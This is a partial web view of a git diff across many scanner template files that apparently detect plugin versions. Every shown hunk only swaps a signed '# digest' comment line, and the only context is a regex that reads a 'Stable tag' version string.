# digest: 4b0a00483046022100adabb681c2e981d525bc678c36a6564eaed405212956167611f3529a5a6227ea022100860b7399f56645b030dd95fa4870336150752d7aede5d675af9d13cb38e6fb81:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 490a00463044022044587b35392120ae5526d928bc2eb651e28d546718a41e02122677a7590ba8de022071994f79b96eb3f51b9aa0538ef6349083d1b05eb517741fe789dd05cf9e9c08:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402204123ab25b007bfd8e4d708fcde6f5fbbdfec009131c3dda0beebeda841c34aae0220329d9149d42462ab5c3516c9f5ae9572a038f3b56ac718c7dfd62b63cc9ae605:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100e2d93f904d739efa400787c004316d1440335a7091ca720846818bca543f2af2022077e25a6bd7bb4a0a1d5ce60b2f2d39c1895b2f5490013321c07cb95d760f6dbb:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100e450d8cf600ff42b19ff2fb838892a27b70782d688fd56fc00fae6030db60e3902202a7d493db8adbcdda86d2c224bca44115664ad093d48c5b03988372c59dbe742:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4b0a00483046022100db6fcd94ca32e2cf9fbe62ffadd6a3a25c25a756b26b9d22e1a9a63a1e4db626022100af5d1349d7b3196fc453ff59021956e8e50331bd54387cb08c5c9f83c2868d52:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100cd6dfcb14f6a18fca657031ce2bf51d6125b69822f833b02c2b91372e2db6276022016e2ebe6685ab797bfaa1b409645483db98351325fdb5be3eb25ff885a6c62da:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100a2be1d3af5a06714b4a5c86852293bdc7f5058fe8a549d3703e58364520f6d1402201804e9f050dfdf3ebc30fa02f93e126548f49701c3ab58b73ccb032ab449805b:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100c747c5e0cd2d751522054fba92540cd617ebf9a2353a59f49874e8e5c40a20b202207b16f54945bfb16f00f1d9bc6ced6803d9ea9678db8f21cce7dc92035423c74d:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100d5639eca9e26f19533b9c9589fb9239e347df2d49ec1e5d5e7c937ae743a0f7d0220481c788ec4e7efc3b18e6fef9f862e566fed7c1a05bc22a442c2769de9644ed9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022022473c8bb0c72d3587572f80dd54945395034cfcd30f5240943acd5250028e45022100e735edf816f058ec8e1b9866aa71c897ec7e1261baaa25cf265abeee2a40c8d0:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100d3c53f90a87ae09604cd7418dfbfe0133a8e74fc8dd26c38e86793330c61bc2402206ee3c1aa22118237f78e7b252a3f7f28aba5ef8f7fcad90fbf74baa5bb8a291c:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402201daa9511d4a40111de8930b1ac4c1c26c815d6ad6d4c2630d93a37fb1da1018f02204ba71ba14acdb1cc3f1f296a9b9a5a721b8de020a1a2be3b8c75a5c37333b0c6:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 490a0046304402204a0a8280cb2c87559f340998530c430c00f74f1d91119ff1a946ef209aefe3c5022056c225d3e6c985b9b839eded1a6e306aca5c0f03e853c8c86e05a27fd7db46c2:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100a4cc431703a07c1babdf6e119ddbdfb7ac4a750ade5302e48ab92c4f82a2638b0221009580cd0665e7f2e197b7c92756951fc8e3d4177f433f1d880eb58bc07b27a61b:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4b0a0048304602210087350830926947ab2df20caf8e71f388cb22dc055778d1a8b69c924af1ea3a65022100d5eebb0f68c41959d2358fcb2fe763cae7786cd0913744d706a0b4e095ab13dc:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220300184ebd5b19471b8d7519c3082e8981e5dd6e75f4e57a5f48070b17d4d81ef022100e998c73ea8678486fa64367f6b1ae845103cbf9c4f3e8bd6c44c4a79c8bc9030:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4b0a00483046022100914765f0863f614c81cbf34fbe87e0a7553535485e22c833dc26e653b1f32c470221009f5b448bd0b819633760f19fe6b5932f6a9b9728f83132aaa3176809997113a5:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220451caa697dd44db06efc6b6c7d98f2f7265e873edb7ebaba8cfed17e4a57c951022100cda52330304a558270a55650efa501bf9d5fe5b04f9ab01e979a84c94b831930:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022034b8a0513b4f5f13f92a4b8ff2664c6ea7d9002e0a9bebe0224d2234815b804a022100cc9b9cc7e5a18c1938b887bf79f2718832c0257dc3271ed6e06daffcad0a9b09:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100f33ca5a7a1abc1501062b1e078f0616fdd57a2543e5dd963da1ff8b820eba9fe022100e3f227aaaebf0e0ca52f8263510e256026d647ad1cf2c12e4e3dee1291b8a73d:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100a2920b05b3520edb1b37904cf8ff21d0eb26cc493baa6f08ded205ed884ab71c022031d6b7f62af315a1dbd8ba05eff7173614df690bf1f4c1b9284eae014e09f91f:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100a128f332b2211fb2848312a2e27c87343ecde21b89986fba3d25278613e31f84022100b71bda84fd5d02835997243b793ed7afa40ce721bd5cb19a3cbd2dab73e6cfe1:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
# digest: 4a0a00473045022100ccca188f28f7547f59bcbb6709a7064329f5e6720b1f54a42e98a968c0369ed602206c8b34df68e337207c1b792ab58c9810dcb7bcaa1a122bd51913516526261a4e:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220087f053070d43e1ce8add1d5f24176d85d297bad70849d43abf6389e240bd6be02203354741deb40c9ae9041c98418ee8c5c26a161b65da27daa61b77cbd16b94c44:922c64590222798bb761d5b6d8e72950
|
||||
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue